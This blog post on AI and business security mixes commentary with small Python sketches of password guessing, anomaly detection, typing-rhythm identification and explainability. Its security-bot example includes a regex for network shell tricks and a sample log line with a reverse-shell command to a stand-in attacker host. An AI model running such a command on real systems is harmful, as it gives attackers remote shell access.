Business Security in the AI Age

Jul 12, 2024, by Mike Jening

The rapid advancement of artificial intelligence is changing the field of cybersecurity, and it is happening right now, not in some distant future. It is challenging us to protect things in new ways. We're going to look at some of the key things that make the AI age different when it comes to security, including what happens when AIs have objectives that aren't aligned with our own, and the many doors we've already left open by using AI to build so many of the systems we rely on for security.

AI-fueled danger: Cybercriminals employ AI to mount far more sophisticated attacks. They use AI models to generate highly convincing phishing lures (a technique already in use), create deepfaked or morphed images that can fool biometric verification, guess a person's passwords, run automated SQL injection attacks against web applications, and much more, all at a speed and scale that outpace human operators.
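To make one of those items concrete, here is a deliberately tiny sketch, entirely my own invention rather than any real attack tool, of the statistical idea behind AI-assisted password guessing: a first-order Markov model learns which character transitions are common in a small made-up "leaked" sample, then ranks candidate guesses by how password-like they look, which is exactly why such guessers outpace blind brute force.

```python
# Toy sketch: rank password guesses with a first-order Markov model.
# Every string here is invented; real guessers train on huge corpora.
import math
from collections import defaultdict

leaked = ["password1", "dragon22", "sunshine7", "passw0rd", "password9"]

# Count character-to-character transitions in the training sample.
transitions = defaultdict(lambda: defaultdict(int))
for pw in leaked:
    for a, b in zip(pw, pw[1:]):
        transitions[a][b] += 1

def log_likelihood(candidate: str) -> float:
    """Score a candidate by how 'password-like' its transitions are."""
    score = 0.0
    for a, b in zip(candidate, candidate[1:]):
        total = sum(transitions[a].values())
        count = transitions[a][b]
        score += math.log((count + 1) / (total + 36))  # add-one smoothing
    return score

candidates = ["password3", "zqxwvkjhg", "sunshine1", "kdjf83jfn"]
for c in sorted(candidates, key=log_likelihood, reverse=True):
    print(f"{log_likelihood(c):8.2f}  {c}")
```

The plausible guesses ("password3", "sunshine1") float to the top while random strings sink, so an attacker trying candidates in this order needs far fewer attempts.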

The defensive applications of AI have also become indispensable in fighting cybercrime. By detecting and analyzing the unusual patterns that indicate a breach, AI helps us respond much faster than we could with human resources alone. Indeed, given the number and speed of modern attacks, we will probably never be able to respond effectively without its assistance.
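As a concrete, heavily simplified sketch of what that looks like, the snippet below uses scikit-learn's Isolation Forest, one common anomaly-detection choice, to flag login events whose patterns don't fit the baseline. The three features and all the numbers are invented for illustration.

```python
# Minimal anomaly-detection sketch, assuming scikit-learn is installed.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(0)

# Features per login event: [hour of day, MB transferred, failed logins].
normal = np.column_stack([
    rng.normal(14, 2, 200),   # daytime activity
    rng.normal(5, 1.5, 200),  # modest transfers
    rng.poisson(0.2, 200),    # rare failures
])
suspicious = np.array([[3.0, 80.0, 9.0]])  # 3 a.m., huge transfer, many failures

events = np.vstack([normal, suspicious])
model = IsolationForest(contamination=0.01, random_state=0)
labels = model.fit_predict(events)  # -1 marks an anomaly

for idx in np.where(labels == -1)[0]:
    print(f"event {idx} flagged as anomalous: {events[idx].round(1)}")
```

The point is not the specific model; it is that a detector like this watches every event, all the time, at a pace no human team can match.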

Concerns about privacy are rising in the AI era. Why? Because AI systems require data, and lots of it. So would that data be safer if the AI ran on a government server? That is what a joint report recently published by Stanford University's Center for Internet and Society warned against. And could an AI system take reams of observational data and use it to identify you by your gait, the pattern of your heartbeat, or the rhythm of your typing on a keyboard? Stanford says yes.
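To show how little data that last kind of identification can need, here is a deliberately crude sketch of typing-rhythm (keystroke-dynamics) matching. Real systems use far richer features and models; every number below is made up.

```python
# Toy keystroke-dynamics sketch: match an unknown typing sample to the
# closest stored profile. All timings are invented for illustration.
import math

# Average inter-key delays (ms) for the same short phrase, per person.
profiles = {
    "alice": [112, 95, 140, 88, 101],
    "bob":   [180, 160, 210, 175, 190],
}
unknown = [118, 99, 133, 92, 104]

def distance(a, b):
    """Euclidean distance between two timing vectors."""
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))

best = min(profiles, key=lambda name: distance(profiles[name], unknown))
print(f"closest typing profile: {best}")  # -> alice
```

Five numbers per person already separate these two toy profiles; with thousands of keystrokes, such signatures become genuinely identifying.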

The ever-widening scope of artificial intelligence keeps throwing up ethical questions that require immediate attention. How do we judge the rightness or wrongness of the decisions an AI-powered security system makes? That debate is ongoing and will continue. There is a genuine concern about how to make these systems more explainable and accountable. After all, the systems being developed today are likely to be very powerful indeed, so much so that they could end up making the kinds of decisions for which we really do look to a human being: decisions over life-and-death situations, for example.
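Explainability is a deep research area (SHAP, LIME, and more), but one narrow route is easy to show: with a linear model, each feature's weight times its value says how much it pushed a specific decision. The feature names and data below are invented, and real security models are rarely this simple.

```python
# Sketch of per-decision explanation for a linear model, assuming
# scikit-learn. Feature names and training data are invented.
import numpy as np
from sklearn.linear_model import LogisticRegression

features = ["failed_logins", "off_hours", "new_device"]

# Tiny made-up training set; label 1 means "malicious".
X = np.array([[0, 0, 0], [1, 0, 0], [5, 1, 1], [7, 1, 0],
              [0, 1, 0], [6, 0, 1], [1, 0, 1], [8, 1, 1]])
y = np.array([0, 0, 1, 1, 0, 1, 0, 1])

clf = LogisticRegression().fit(X, y)

event = np.array([6, 1, 0])  # the decision we want to explain
contributions = clf.coef_[0] * event  # per-feature push toward "block"

print(f"p(malicious) = {clf.predict_proba([event])[0, 1]:.2f}")
for name, c in sorted(zip(features, contributions), key=lambda t: -abs(t[1])):
    print(f"  {name:14s} contribution {c:+.2f}")
```

An analyst reviewing the alert sees not just a verdict but which signals drove it, which is the accountability the paragraph above is asking for.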

AI as the human factor: as AI's presence in security programs has grown, so has its presence in the discussion of what it means to be human. Even seemingly simple security "bots" that rove through networks looking for signs of suspicious activity now imitate a slice of human judgment: they weigh what constitutes a threat, much as a security analyst would, and they are becoming more adept at it all the time. Yet they lack something that remains, for now, a distinctively human attribute: moral judgment.
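For a sense of how mechanical that "judgment" really is, here is a toy sketch of the pattern-scoring at the heart of many such bots. Every indicator, weight, and log line is invented for illustration; production systems learn their signals rather than hard-coding them.

```python
# Toy "security bot": score log lines against weighted indicators and
# alert above a threshold. All patterns and weights here are invented.
import re

INDICATORS = [
    (re.compile(r"failed password", re.I), 2),
    (re.compile(r"nc -e|/dev/tcp/"), 5),  # shell-over-network tricks
]
ALERT_THRESHOLD = 4

def score(line: str) -> int:
    """Sum the weights of every indicator that matches the log line."""
    return sum(w for pattern, w in INDICATORS if pattern.search(line))

logs = [
    "Jul 12 03:14:07 sshd: failed password for root",
    "Jul 12 03:15:01 bash -c 'nc -e /bin/sh evil.example 4444'",
]
for line in logs:
    if (s := score(line)) >= ALERT_THRESHOLD:
        print(f"ALERT (score {s}): {line}")
```

Pattern matching plus arithmetic: effective and tireless, but nothing like moral judgment.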

As we move through this uncharted territory, it is becoming apparent that AI will dominate the cyber battlefield, with both offensive and defensive moves made by machines. People and organizations must be aware of this and base their strategies on it; otherwise, we will not be able to keep up, much less thrive, in an era where AI is king.